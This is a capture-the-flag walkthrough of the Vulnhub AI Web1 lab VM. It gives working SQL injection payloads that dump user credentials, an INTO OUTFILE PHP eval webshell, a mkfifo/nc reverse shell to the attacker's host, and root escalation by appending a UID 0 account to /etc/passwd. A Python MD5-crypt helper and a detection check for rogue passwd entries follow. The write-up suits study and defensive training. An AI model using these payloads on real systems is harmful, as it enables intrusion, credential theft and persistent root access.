Vulnhub VM: AI Web1

像小强一样活着, 2022-01-20

1. Information gathering

Use netdiscover to locate the target on the LAN; its IP is 192.168.1.137.
![image.png](https://img-blog.csdnimg.cn/img_convert/3c3a865fe295dfe4ffa7cdd375d5ff57.png#clientId=u3726a821-38b7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=438&id=u4fec9964&margin=[object Object]&name=image.png&originHeight=466&originWidth=647&originalType=binary&ratio=1&rotation=0&showTitle=false&size=151029&status=done&style=none&taskId=u13d251ea-cf2b-4b6b-b9e3-289896638f6&title=&width=607.4883117675781)
Port-scan the target with nmap; only port 80 is open.
![image.png](https://img-blog.csdnimg.cn/img_convert/a363a571acfb7af511d446b38679c7cd.png#clientId=u3726a821-38b7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=535&id=u9c2af8b3&margin=[object Object]&name=image.png&originHeight=566&originWidth=642&originalType=binary&ratio=1&rotation=0&showTitle=false&size=197980&status=done&style=none&taskId=u75e4d41a-78cd-4fc0-91a6-e3a75018955&title=&width=606.9984741210938)
Browsing to port 80 shows a page with a single sentence and nothing usable.
![image.png](https://img-blog.csdnimg.cn/img_convert/49106f05b6809e534638a6f13be64a10.png#clientId=u3726a821-38b7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=260&id=ucabbb72c&margin=[object Object]&name=image.png&originHeight=391&originWidth=911&originalType=binary&ratio=1&rotation=0&showTitle=false&size=44010&status=done&style=none&taskId=ueb2062ee-1a84-45d7-9a53-b157e806046&title=&width=605.48779296875)
Enumerate the site's directories with dirsearch -u http://192.168.1.137/.
![image.png](https://img-blog.csdnimg.cn/img_convert/139c239fcfd93c364f48eb81000cc63a.png#clientId=u3726a821-38b7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=674&id=u144c8b9c&margin=[object Object]&name=image.png&originHeight=710&originWidth=637&originalType=binary&ratio=1&rotation=0&showTitle=false&size=125252&status=done&style=none&taskId=u751cc6aa-89f7-4eea-87d6-b8a3c45f55e&title=&width=604.4959411621094)

2. Vulnerability discovery and exploitation

Requesting /server-status/ is refused (access denied). robots.txt, however, lists two directories.
![image.png](https://img-blog.csdnimg.cn/img_convert/96801f76b8e00b1a25fa8fe4c83d724a.png#clientId=u3726a821-38b7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=249&id=ua3b75d9e&margin=[object Object]&name=image.png&originHeight=309&originWidth=762&originalType=binary&ratio=1&rotation=0&showTitle=false&size=47767&status=done&style=none&taskId=u01739c8e-76e1-4068-aaed-a12207d57b5&title=&width=612.9959411621094)
Requesting each of those two directories directly is also refused.
![image.png](https://img-blog.csdnimg.cn/img_convert/67fc9f8e757af19d1f271107aa7824b3.png#clientId=u3726a821-38b7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=238&id=ud25171f9&margin=[object Object]&name=image.png&originHeight=344&originWidth=885&originalType=binary&ratio=1&rotation=0&showTitle=false&size=57743&status=done&style=none&taskId=u0bf5965e-0944-41fa-b18b-e32dca110d8&title=&width=613.4923706054688)
So try the parent directory /se3reTdir777/ instead: it serves a page with a form and a submit box.
![image.png](https://img-blog.csdnimg.cn/img_convert/a82ca82dab050cb47738f01bf1993fd5.png#clientId=u3726a821-38b7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=254&id=u3aa81712&margin=[object Object]&name=image.png&originHeight=331&originWidth=802&originalType=binary&ratio=1&rotation=0&showTitle=false&size=48962&status=done&style=none&taskId=u3b817d09-62b4-4cee-9a37-32277a5c0bc&title=&width=615.9908447265625)
To gather more information, scan both directories for further content. The scan turns up info.php under m3diNf0; it is a phpinfo probe page, which is an information disclosure (it exposes paths and PHP/MySQL configuration that become useful later).
![image.png](https://img-blog.csdnimg.cn/img_convert/f7a5e6dce8d0f6906bd3db8f71586387.png#clientId=u3726a821-38b7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=532&id=uc60a296c&margin=[object Object]&name=image.png&originHeight=839&originWidth=955&originalType=binary&ratio=1&rotation=0&showTitle=false&size=141924&status=done&style=none&taskId=u27802ddf-7fc4-456c-9842-c5154cda8ca&title=&width=605.4898376464844)

2.1 SQL injection

The submit box looks like it feeds a database query, so test it for injection: with a test payload in the field the page still renders a normal result, which means the input reaches the query unsanitised and the form is injectable.
![image.png](https://img-blog.csdnimg.cn/img_convert/4431fc50c19e9baca3f3ee4b057b9ba1.png#clientId=u3726a821-38b7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=553&id=u3b04e1e3&margin=[object Object]&name=image.png&originHeight=625&originWidth=682&originalType=binary&ratio=1&rotation=0&showTitle=false&size=59870&status=done&style=none&taskId=u9be92362-3a1b-4415-865b-5486957ce2f&title=&width=602.993408203125)

  • Identify the database type: it is a MySQL server.

![image.png](https://img-blog.csdnimg.cn/img_convert/6ae061b1d24aae5f9e9ff443576f46b0.png#clientId=u3726a821-38b7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=194&id=u26855b53&margin=[object Object]&name=image.png&originHeight=291&originWidth=909&originalType=binary&ratio=1&rotation=0&showTitle=false&size=56082&status=done&style=none&taskId=u5c1aab1c-a27e-474a-8403-1a3b7255935&title=&width=607.4969482421875)

  • Determine the column count: 1' order by 3 -- - returns normally, while order by 4 errors out, so the query behind the form selects 3 columns. (This is the width of the query, not of any particular table; it fixes how many columns a UNION SELECT must supply.)

![image.png](https://img-blog.csdnimg.cn/img_convert/2fdd929b9736f40c5d41c9bc74966d8f.png#clientId=u3726a821-38b7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=226&id=WEyby&margin=[object Object]&name=image.png&originHeight=271&originWidth=726&originalType=binary&ratio=1&rotation=0&showTitle=false&size=39593&status=done&style=none&taskId=u43c6ac26-0b61-42bb-bd2c-d0d0b83ae0d&title=&width=605.9989929199219)

  • Dump the current database name and the database user:

-1' union select 1,database(),user() -- -
![image.png](https://img-blog.csdnimg.cn/img_convert/24bdfdd33a25278e4784bc1f2ebbfab1.png#clientId=u3726a821-38b7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=432&id=u789ddde8&margin=[object Object]&name=image.png&originHeight=439&originWidth=616&originalType=binary&ratio=1&rotation=0&showTitle=false&size=50231&status=done&style=none&taskId=u0c4963c9-1796-40fa-a687-9ba40460aca&title=&width=605.9903564453125)

  • Dump the table names in the current database: there are two tables, user and systemUser. (The payload below reads table_name from information_schema.columns, so each table appears once per column; querying information_schema.tables, or wrapping the name in group_concat(), gives one row per table.)

-1' union select 1,table_name,3 from information_schema.columns where table_schema='aiweb1' -- -
![image.png](https://img-blog.csdnimg.cn/img_convert/9b3f9532cfd17d9ef0dff05ac72d9a74.png#clientId=u3726a821-38b7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=397&id=u1c3202ac&margin=[object Object]&name=image.png&originHeight=509&originWidth=780&originalType=binary&ratio=1&rotation=0&showTitle=false&size=50392&status=done&style=none&taskId=u1e3431ab-05cb-4c83-8f15-6f856c4963e&title=&width=607.9898376464844)

  • Dump the column names of the user and systemUser tables respectively.

-1' union select 1,column_name,3 from information_schema.columns where table_name='user' -- -
![image.png](https://img-blog.csdnimg.cn/img_convert/8d58f838de8e6319d682a358ae2e3703.png#clientId=u3726a821-38b7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=492&id=u54c69056&margin=[object Object]&name=image.png&originHeight=525&originWidth=652&originalType=binary&ratio=1&rotation=0&showTitle=false&size=35141&status=done&style=none&taskId=udfea8c93-4d28-42b9-8294-fe001dbf94e&title=&width=610.9908447265625)
-1' union select 1,column_name,3 from information_schema.columns where table_name='systemUser' -- -
![image.png](https://img-blog.csdnimg.cn/img_convert/826776e1a833bccf1e8b8ba2a4b5fb61.png#clientId=u3726a821-38b7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=562&id=u7c5b62e7&margin=[object Object]&name=image.png&originHeight=540&originWidth=581&originalType=binary&ratio=1&rotation=0&showTitle=false&size=38619&status=done&style=none&taskId=uf8104b4b-cb8e-48a1-aed1-c1910f27543&title=&width=604.4908447265625)

  • Dump the contents of the user table.

-1' union select id,firstName,lastName from user -- -
![image.png](https://img-blog.csdnimg.cn/img_convert/0d674c10ad6b6dd35abb103695108911.png#clientId=u3726a821-38b7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=588&id=ufe689889&margin=[object Object]&name=image.png&originHeight=522&originWidth=536&originalType=binary&ratio=1&rotation=0&showTitle=false&size=47297&status=done&style=none&taskId=ua61f37e5-295f-4cd2-b588-3b5de39d9e8&title=&width=603.98779296875)

  • Dump the contents of the systemUser table (the userName and password columns).

-1' union select id,userName,password from systemUser -- -
![image.png](https://img-blog.csdnimg.cn/img_convert/3afcd00a0631cb93bbd1c7fe93a50132.png#clientId=u3726a821-38b7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=420&id=u2760b1ff&margin=[object Object]&name=image.png&originHeight=500&originWidth=712&originalType=binary&ratio=1&rotation=0&showTitle=false&size=45325&status=done&style=none&taskId=ubb5b99fa-9a51-4bd7-b8c6-ddc3fafc859&title=&width=597.9959411621094)

2.2 Writing a shell with into outfile

First we need the absolute filesystem path of the web root; the phpinfo probe reveals it (DOCUMENT_ROOT / SCRIPT_FILENAME).
![image.png](https://img-blog.csdnimg.cn/img_convert/98bda200d0f730ffd210529eb9c3cfbc.png#clientId=u3726a821-38b7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=539&id=u2334ee92&margin=[object Object]&name=image.png&originHeight=781&originWidth=871&originalType=binary&ratio=1&rotation=0&showTitle=false&size=109613&status=done&style=none&taskId=uc6247173-f418-482d-a649-7fd2e854c58&title=&width=601.4928894042969)
Try writing a one-line PHP webshell into the upload directory /se3reTdir777/uploads via into outfile. This only works when the MySQL user holds the FILE privilege, secure_file_priv does not restrict the target directory, and the mysqld process itself can write there (the file is created by the database server, not by PHP). The three selected columns are written tab-separated; the leading "1 2" is just emitted as text before the PHP tag executes.
-1' union select 1,2,'<?php @eval($_POST[123]);?>' into outfile "/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/hack.php" -- -
![image.png](https://img-blog.csdnimg.cn/img_convert/2e803954d07cffc04a8101572de9b28c.png#clientId=u3726a821-38b7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=143&id=ua60db2d2&margin=[object Object]&name=image.png&originHeight=230&originWidth=956&originalType=binary&ratio=1&rotation=0&showTitle=false&size=48392&status=done&style=none&taskId=ud439879d-8a74-45cc-b9ae-218c77a4828&title=&width=592.9979553222656)
AntSword (蚁剑) connects to the webshell successfully.
![image.png](https://img-blog.csdnimg.cn/img_convert/9833f8ea02dd6c05f96744ff5c9d8b99.png#clientId=u3726a821-38b7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=199&id=u03dc6ddb&margin=[object Object]&name=image.png&originHeight=332&originWidth=1011&originalType=binary&ratio=1&rotation=0&showTitle=false&size=31110&status=done&style=none&taskId=ufb249b05-ac9c-4801-9ca7-6ece9932fd5&title=&width=606.48779296875)

3. Reverse shell

  • Start a listener on Kali (192.168.1.128): nc -lvvp 6666
  • From the AntSword terminal, fire the nc reverse shell (the mkfifo form works with nc builds that lack -e): rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.128 6666 >/tmp/f
  • The reverse shell connects back.
  • For convenience, upgrade it to an interactive TTY with python -c 'import pty;pty.spawn("/bin/bash")'.

![image.png](https://img-blog.csdnimg.cn/img_convert/fe36a4fbe0792b6df37ba8530f3a89de.png#clientId=u3726a821-38b7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=116&id=ucd99151c&margin=[object Object]&name=image.png&originHeight=151&originWidth=796&originalType=binary&ratio=1&rotation=0&showTitle=false&size=24703&status=done&style=none&taskId=u9c0b4cae-5148-462e-9c74-48c1d81b70f&title=&width=611.9928894042969)
![image.png](https://img-blog.csdnimg.cn/img_convert/ec84f4a06d7063b5cc04f26d3c8f895c.png#clientId=u3726a821-38b7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=242&id=ud7713124&margin=[object Object]&name=image.png&originHeight=288&originWidth=732&originalType=binary&ratio=1&rotation=0&showTitle=false&size=113122&status=done&style=none&taskId=u57f26cde-f06a-4397-a819-1a2485b6cb6&title=&width=613.993408203125)

4. Privilege escalation

  • Check the attributes of /etc/passwd: the current user has read and write permission on it, which should never be the case.

![image.png](https://img-blog.csdnimg.cn/img_convert/8b5528fb59f0b620dada5e9869cad088.png#clientId=u3726a821-38b7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=83&id=ueb32a4f6&margin=[object Object]&name=image.png&originHeight=99&originWidth=720&originalType=binary&ratio=1&rotation=0&showTitle=false&size=38135&status=done&style=none&taskId=u52ef534e-b483-4838-8b32-0f42a53faba&title=&width=606.9974670410156)

  • So escalate by appending a new UID 0 user to /etc/passwd.
  • Create a user named hack and generate its password hash with openssl (MD5-crypt, the $1$ scheme that crypt(3) still accepts):

openssl passwd -1 -salt hack hack
![image.png](https://img-blog.csdnimg.cn/img_convert/ba651766b647ef8022d37950e006fefd.png#clientId=u3726a821-38b7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=108&id=u0ea5a18e&margin=[object Object]&name=image.png&originHeight=112&originWidth=639&originalType=binary&ratio=1&rotation=0&showTitle=false&size=36983&status=done&style=none&taskId=uac282427-5134-4fd9-b6b5-3ccea2d979d&title=&width=615.4989624023438)

  • Assemble the hash into a line in /etc/passwd format (UID 0, GID 0, home /root, shell /bin/bash). Because the second field holds a hash instead of x, login checks it directly and never consults /etc/shadow:

hack:$1$hack$xR6zsfvpez/t8teGRRSNr.:0:0::/root:/bin/bash

  • Append the line to /etc/passwd. The single quotes matter: without them the shell would expand $1, $hack and $xR6zsfvpez in the hash.

echo 'hack:$1$hack$xR6zsfvpez/t8teGRRSNr.:0:0::/root:/bin/bash' >> /etc/passwd
![image.png](https://img-blog.csdnimg.cn/img_convert/19ebd0456795fed2e541791eb0651f32.png#clientId=u3726a821-38b7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=88&id=u8d635784&margin=[object Object]&name=image.png&originHeight=103&originWidth=726&originalType=binary&ratio=1&rotation=0&showTitle=false&size=44098&status=done&style=none&taskId=uaf7b40e8-f241-48ab-b367-e496898b3b3&title=&width=620.9954223632812)

  • Log in as the new user (su hack, password hack); the resulting shell is root.

![image.png](https://img-blog.csdnimg.cn/img_convert/5d8f8216705b158782d1f01ef1d8266c.png#clientId=u3726a821-38b7-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=240&id=u4d03dfba&margin=[object Object]&name=image.png&originHeight=283&originWidth=736&originalType=binary&ratio=1&rotation=0&showTitle=false&size=70917&status=done&style=none&taskId=u84167c34-7cd9-477b-a065-f819103053d&title=&width=624.98779296875)
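The hash generation and passwd-line assembly above, as an added worked example that is not part of the original post: a pure-Python reimplementation of MD5-crypt (the $1$ format that openssl passwd -1 emits) so the line can be built without an openssl binary on the box, together with the reverse check a defender would run over /etc/passwd, flagging entries that have UID 0 but are not root or that carry a hash inline instead of x. The sample passwd text is constructed; the expected hash is the one the post obtained from openssl.

```python
import hashlib

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value, count):
    # crypt(3)'s base64 variant: low 6 bits first, custom alphabet
    out = ""
    for _ in range(count):
        out += ITOA64[value & 0x3F]
        value >>= 6
    return out


def md5_crypt(password, salt):
    """MD5-crypt ($1$), equivalent to `openssl passwd -1 -salt SALT PASSWORD`."""
    magic = b"$1$"
    pw = password.encode()
    salt_b = salt[:8].encode()  # crypt uses at most 8 salt characters
    ctx = hashlib.md5(pw + magic + salt_b)
    alt = hashlib.md5(pw + salt_b + pw).digest()
    remaining = len(pw)
    while remaining > 0:  # mix in the alternate digest, one chunk per 16 bytes of password
        ctx.update(alt[: min(16, remaining)])
        remaining -= 16
    bit = len(pw)
    while bit:  # the "something really weird" step from the reference implementation
        ctx.update(b"\x00" if bit & 1 else pw[:1])
        bit >>= 1
    final = ctx.digest()
    for i in range(1000):  # 1000 stretching rounds
        rnd = hashlib.md5()
        rnd.update(pw if i & 1 else final)
        if i % 3:
            rnd.update(salt_b)
        if i % 7:
            rnd.update(pw)
        rnd.update(final if i & 1 else pw)
        final = rnd.digest()
    groups = ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5))
    encoded = "".join(
        _to64((final[a] << 16) | (final[b] << 8) | final[c], 4) for a, b, c in groups
    )
    encoded += _to64(final[11], 2)
    return "$1$" + salt_b.decode() + "$" + encoded


def passwd_line(user, password, salt, uid=0, gid=0, home="/root", shell="/bin/bash"):
    """The seven-field /etc/passwd entry; a hash in field 2 bypasses /etc/shadow."""
    return f"{user}:{md5_crypt(password, salt)}:{uid}:{gid}::{home}:{shell}"


def suspicious_passwd_entries(passwd_text):
    """Defender-side check: UID 0 accounts other than root, and accounts whose
    password field holds a hash inline rather than the shadow marker 'x'."""
    findings = []
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if uid == "0" and name != "root":
            findings.append((name, "uid 0"))
        if pw not in ("x", "*", "") and not pw.startswith("!"):
            findings.append((name, "inline hash"))
    return findings


# Constructed /etc/passwd excerpt with the appended backdoor account.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
hack:$1$hack$xR6zsfvpez/t8teGRRSNr.:0:0::/root:/bin/bash
"""

if __name__ == "__main__":
    print(passwd_line("hack", "hack", "hack"))
    for name, reason in suspicious_passwd_entries(SAMPLE_PASSWD):
        print(f"suspicious: {name} ({reason})")
```

On a real host the same detection is a one-liner in the audit pipeline (awk -F: '$3==0 && $1!="root" || $2!="x"' /etc/passwd); the point of writing it out is that a duplicate UID 0 entry is invisible to anything that looks up users by UID, so the check has to iterate the file by name.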

5. Summary

  • Recursive directory scanning to find hidden files
  • SQL injection
  • into outfile needs the site's absolute path, a directory the database server can write to, and the FILE privilege with secure_file_priv not in the way
  • Writing a one-liner webshell (done here through the injection; an echo from a shell achieves the same once you have one)
  • Simple Linux privilege escalation: a writable /etc/passwd lets you append a UID 0 user directly
  • Using openssl passwd to generate the password hash